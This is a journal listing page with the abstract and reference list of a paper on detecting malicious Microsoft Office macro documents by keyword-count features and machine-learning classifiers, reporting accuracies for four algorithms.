Browse > Article
http://dx.doi.org/10.9708/jksci.2022.27.05.149

OLE File Analysis and Malware Detection using Machine Learning  

Choi, Hyeong Kyu (Dept. of Information Security, Pai Chai University)
Kang, Ah Reum (Dept. of Information Security, Pai Chai University)
Abstract
Recently, there have been many reports of document-type malicious code injecting malicious code into Microsoft Office files. Document-type malicious code is often hidden by encoding the malicious code in the document. Therefore, document-type malware can easily bypass anti-virus programs. We found that malicious code was inserted into the Visual Basic for Applications (VBA) macro, a function supported by Microsoft Office. Malicious codes such as shellcodes that run external programs and URL-related codes that download files from external URLs were identified. We selected 354 keywords repeatedly appearing in malicious Microsoft Office files and defined the number of times each keyword appears in the body of the document as a feature. We performed machine learning with SVM, naïve Bayes, logistic regression, and random forest algorithms. As a result, each algorithm showed accuracies of 0.994, 0.659, 0.995, and 0.998, respectively.
Keywords
OLE; malware; Microsoft Office; shellcode; VBA macro; random forest;
Citations & Related Records
Times Cited By KSCI : 6  (Citation Analysis)
연도 인용수 순위
1 Balal Sohail, Ma'en Tayseer Ekrayem Alrashd, Yaseein Soubhi Hussein, Mohammad Tubishat, Shounak Ghosh, Ahmed Saeed Alabed, "Macro based Malware Detection System", Turkish Journal of Computer and Mathematics Education, Vol. 12, No. 3, pp. 5776-5787, April 2021. DOI:10.17762/turcomat.v12i3.2254   DOI
2 Young-Seob Jeong, Jiyoung Woo and Ah Reum Kang, "Malware Detection on Byte Streams of Hangul qord Processor Files", Applied Sciences, Vol. 9, No. 23, pp. 5178, Nov. 2019. DOI: 10.3390/app9235178   DOI
3 Pan Jun Kim, "An Analytical Study on Automatic Classification of Domestic Uournal Articles Using Random Forest", Journal of the Korean Society for Information Management, Vol. 36, No. 2, pp. 57-77, 2019. DOI:10.3743/KOSIM.2019.36.2.057   DOI
4 Gil Min-kwon, "In December, HWP OLE-based APT Attack by the Geumseong121", https://www.dailysecu.com/news/articleView.html?idxno=118508, Dailysecu, Dec. 2020.
5 Jonghyun Lee, "Ahnlab Urges Caution against Malicious Code Distributed as Document Files", https://www.ddaily.co.kr/news/article/?no=221749, Digital Daily, Sep. 2021.
6 Sung Hye Cho and Sang Jin Lee, "A Research of Anomaly Detection Method in MS Office Document", KIPS Transactions on Computer and Communication Systems, Vol. 6, No. 2, pp. 87-94, Feb. 2017. DOI:10.3745/KTCCS.2017.6.2.87   DOI
7 Jonghyun Lee, "Disguised Document File for Hacking Related to Disaster Aid", https://www.ddaily.co.kr/news/article/?no=223783, Digital Daily, Oct. 2021.
8 Ah Reum Kang, Young-seob Jeong, Se Lyeong Kim and Jiyoung Woo, "Malicious PDF Detection Model against Adversarial Attack Built from Benign PDF Containing Javascript", Applied Sciences, Vol. 9, No. 22, pp. 4764, Nov. 2019. DOI: 10.3390/app9224764   DOI
9 Young-Seob Jeong, Jiyoung Woo and Ah Reum Kang, "Malware Detection on Byte Streams of PDF Files Using Convolutional Neural Networks", Hindawi Security and Communication Networks, 2019, April 2019. DOI:10.1155/2019/8485365   DOI
10 Jafar Alzubi, Anand Nayyar and Akshi Kumar, "Machine Learning from Theory to Algorithms an Overview", Journal of Physics: Conference Series, Vol. 1142, Dec. 2018. DOI:10.1088/1742-6596/1142/1/012012   DOI
11 Batta Mahesh, "Machine Learning Algorithms - A Review", International Journal of Science and Research, Vol. 9, Issue 1, Jan. 2019. DOI: 10.21275/ART20203995   DOI
12 Young-Seob Jeong, Jiyoung Woo, SangMin Lee and Ah Reum Kang, "Malware Detection of Hangul Word Processor Files Using Spatial Pyramid Average Pooling", Sensors, Vol. 20, No. 18, pp. 5265, Sep. 2020. DOI:10.3390/s20185265   DOI
13 Jae Hyup Kim, Hyn Ki Kim, Kyung Hyun Jang, Jong Min Lee and Young Shik Moon, "Object Classification Method Using Dynamic Random Forests and Genetic Optimization", Journal of The Korea Society of Computer and Information, Vol. 21, No. 5, pp. 79-89, May. 2016. DOI:10.9708/jksci.2016.21.5.079   DOI
14 Byengha Choi, Kyungsan Cho, "Comparison of HMM and SVM Schemes in Detecting Mobile Botnet", The Korea Society of Computer and Information, Vol. 19, No. 4, pp. 81-90, April 2014. DOI:10.9708/jksci.2014.19.4.081   DOI
15 Mikus and Nicholas, "An Analysis of Disc Carving Techniques", Naval Postgraduate School Monterey CA Dept of Computer Science, March 2005.
16 Moon Kwon Kim, Seung Ho Han, Hyun Jung La and Soo Dong Kim, "Design of Effective Inference Methods for Supporting Various Medical Analytics Schemes", The Korean Institute of Information Scientists and Engineers, Vol. 42, No. 1, pp. 1102-1104, June 2015.
17 Aleksander Kolcz, "Local Sparsity Control for Naive Bayes with Extreme Misclassification Costs", Proceedings of the Eleventh ACM SIGKDD International Conference on Knowledge Discovery in Data Mining, pp. 128-137, Aug. 2005.
18 Hong-Koo Kang, Ji-Sang Kim, Byung-Ik Kim and Hyun-Cheol Jeong, "Development of an Automatic Document Malware Analysis System", IT Convergence and Security Lecture Notes in Electrical Engineering, pp. 3-11, 2012. DOI: 10.1007/978-94-007-5860-5_1   DOI
19 Jihyeon Song, Jungtae Kim, Sunoh Choi, Jonghyun Kim, Ikkyun Kim, "Evaluations of AI-based Malicious PowerShell Detection with Feature Optimizations", ETRI Journal Wiley, Vol. 43, No. 3, pp. 549-560, Nov. 2020. DOI: 10.4218/etrij.2020-0215   DOI
20 Sangwoo Kim, Seokmyung Hong, Jaesang Oh and Heejo Lee, "Obfuscated VBA Macro Detection Using Machine Learning", IEEE/IFIP International Conference on Dependable Systems and Networks, pp. 490-501, 2018. DOI:10.1109/DSN.2018.00057   DOI
21 Ji Hyun Lee, Ah Reum Kang, Sang Hyun Kim and Ji Young Woo, "Multi-Cutting Machine for TJ Coupler Production", Proceedings of the Korean Society of Computer Information Conference, Vol. 27, No. 1, Jan. 2019.
22 Yeong-Hwil Ahn, Koo-Rack Park, Dong-Hyun Kim and Do-Yeon Kim, "A Study on the Development of Product Planning Prediction Model Using Logistic Regression Algorithm", The Korea Convergence Society, Vol. 12, No. 9, pp. 39-47, Sep. 2021. DOI:10.15207/JKCS.2021.12.9.039   DOI